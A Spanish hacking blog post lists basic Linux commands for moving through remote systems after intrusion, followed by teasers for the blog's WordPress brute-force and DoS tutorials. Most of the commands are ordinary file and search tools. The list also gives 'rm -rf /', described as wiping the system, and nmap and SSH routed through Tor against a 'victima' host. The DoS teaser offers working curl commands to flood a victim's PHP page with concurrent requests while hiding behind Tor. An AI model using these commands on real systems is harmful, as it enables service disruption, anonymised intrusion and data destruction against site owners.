Ir al contenido principal

Comandos básicos imprescindibles para hacking en Linux

A continuación, un pequeño resumen de comandos básicos de Linux y herramientas para los que recién empiezan. Son imprescindibles para moverse fluídamente en sistemas remotos, buscar, copiar, transferir, anonimato, etc  útiles al momento de ingresar a un sistema.


Copiar archivos por SSH/SCP
de local a remoto
scp /ruta-archivo-origen usuario@servidor.com:/ruta-al-destino

de remoto a local
scp usuario@servidor.com:/ruta-archivo-origen /ruta-al-destino

Descargar archivo remoto por http / https / ftp
wget url.com/archivo

Buscar una palabra dentro de todos los archivos de un directorio
grep -r "texto a buscar" /directorio/

Buscar archivos
find /directorio -name "nombre archivo"

Buscar archivos con algun permiso en particular en todo el sistema
find . -type f -perm 0775

Buscar archivos creados por un usuario en particular en todo el sistema
find /directorio -user nombre-usuario

Buscar por tamaño (ej: archivos hasta de 50MB)
find / -size 50M

Buscar y ejecutar comando al encontrar lo buscado (ej: borrar)
find . -type f -name "archivo a buscar" -exec [comando a ejecutar] {} \;

Buscar y reemplazar texto en un archivo
sed -i 's/texto-a-buscar/texto-a-reemplazar/g' "archivo.txt"

Editor hexadecimal (ver o volcar contenido a hexadecimal)
xxd [archivo]

Busca las librerías que utiliza un ejecutable
ldd /directorio/ejecutable

Destruye por completo el sistema, borrando de forma recursiva todos los archivos y directorios.
rm -rf /

Compilar un archivo en C  (convertir fuente a ejecutable)
gcc archivo.c -o archivo

Comprimir un archivo
gzip archivo

Descomprimir un archivo
gunzip archivo.gz


Muestra las ultimas entradas en un archivo. (util para revisar logs)
tail /directorio/archivo.txt  (o tail -n [número de lineas a mostrar] archivo.txt)

Muestra las primeras entradas en un archivo
head /directorio/archivo.txt (o head -n [número de lineas a mostrar] archivo.txt)


Muestra todas las conexiones tcp activas en el sistema
netstat -t


Nmap a travez de TOR proxy  (suponiendo que tor ya está instalado y corriendo) 
nmap --proxies socks4://127.0.0.1:9050 victima.com


SSH a travez de TOR proxy  (suponiendo que tor ya está instalado y corriendo)
ssh -o ProxyCommand='nc -x 127.0.0.1:9150 %h %p'  usuario@dominio.com

Comentarios

Entradas populares de este blog

Ataque por Fuerza Bruta a Wordpress

En éste pequeño tutorial mostraré como hacer un ataque de fuerza bruta   o bruteforce (es decir, probar muchas combinaciónes de usuario/clave por segundo) para obtener acceso en cualquier Wordpress .   No hace falta ser un "hacker" para ésta tarea ya que solo estamos utilizando una herramienta.  Publico éste tutorial con fines didácticos para que otros puedan probar la fortaleza de sus propios sitios y principalmente para concientizar de que nada es seguro en internet, a menos que nosotros lo hagamos seguro. Si bien existen infinidad de herramientas, o incluso hasta podríamos hacerlo manualmente con curl + bashscript,  el software por exclencia es WPScan y lo pueden bajar desde: https://github.com/wpscanteam/wpscan WPScan permite: listar vulnerabilidades, listar plugins, themes, y nombres de usuarios y principalmente realizar ataques de fuerza bruta de una forma sencilla y rápida. Al correr por primera vez WPScan nos pedirá actualizarlo en primer lug...

Ejemplos de ataque DOS con Curl y Tor

Es posible realizar un ataque DOS (sin necesidad de que sea distribuído, sin herramientas especiales y con una conexión común), valiéndonos solamente de CURL para realizar miles de peticiones simultáneas  y TOR para ocultar nuestro rastro. Basicamente un ataque a la capa de aplicación . ¿Cómo? con curl, realizando múltiples peticiones por segundo y concurrentes, atacando al servidor web, aunque por lo general lo que termina consumiendo toda la memoria de la víctima es la base de datos que la web utiliza. Un ejemplo simple sería el siguiente: Enviamos 1000 peticiones con Curl: curl -s "http://victima.com/algo.php?[1-1000]" Si queremos que éstas peticiones sean a su vez concurrentes, entonces deberíamos poner en segundo plano cada llamada a curl tantas veces como concurrencias se necesiten.  Ejemplo:  curl -s "http://victima.com/algo.php?[1-1000]" & pidlist="$pidlist $!" curl -s "http://victima.com/algo.php?[1-1000]" & pidli...